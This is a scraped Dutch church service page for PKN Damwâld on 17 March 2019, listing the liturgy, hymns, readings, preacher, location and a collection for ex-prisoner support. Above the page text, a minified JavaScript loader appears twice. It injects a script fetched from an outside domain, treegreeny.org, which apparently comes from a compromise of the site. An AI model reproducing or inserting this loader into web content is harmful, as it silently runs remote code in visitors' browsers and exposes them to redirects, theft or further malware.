;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 17 maart 2019 9:30 uur - PKN Damwâld
zondag 17 maart 2019
09:30 uur

Kerkdienst zondag 17 maart 2019 9:30 uur

Informatie

Voorganger:Ds. W.L. de Jong, Rinsumageast
Organist:Nienke van der Heide-Visser
Liturgie
Lied voor de dienst Elb 226
Welkom
Intochtslied Psalm 25 : 1, 2 en 3
Stilgebed, Votum en Groet
Gebed van verootmoediging
We zingen: Gezang 169: 1 , 2 en 4
Gebod van God Romeinen 12: 9-18
We zingen: Gezang 169: 5
Gebed voor de opening v.h. Woord
We lezen: Ex. 34: 27-35
We zingen: Psalm 111: 1 en 4
We lezen: Lucas 9: 28-36
We zingen: Elb 185 : 1, 2 en 3
Preek .
We zingen: gezang 173: 1, 2, 3 en 4
Dank- en voorbeden besloten met Onze Vader
Collecte
Slotlied Elb 289 : 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Verlaat de gevangenis en dan?

Veel gevangenen willen na het uitzitten van hun straf een nieuw leven opbouwen. Op eigen kracht blijkt dit erg moeilijk. Ex-gedetineerden hebben vaak schulden, geen woonruimte, geen werk en geen sociaal netwerk. Stichting Exodus Nederland, partnerorganisatie van Kerk in Actie, biedt hen de kans te werken aan een succesvolle terugkeer in de samenleving. In één van de elf Exodushuizen worden ex-gedetineerden via een woon- en werkprogramma geholpen hun leven weer op te bouwen. Meer dan 1.600 vrijwilligers - veelal afkomstig uit kerkelijke gemeenten - werken in de Exodushuizen, bezoeken gedetineerden in gevangenissen of begeleiden kinderen bij een bezoek aan een ouder in detentie. Jaarlijks ondersteunen zij daarmee 4.000 gevangenen, ex-gevangenen en hun familieleden. Met de opbrengst van deze collecte steunt Kerk in Actie het werk van Exodus en andere diaconale projecten.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds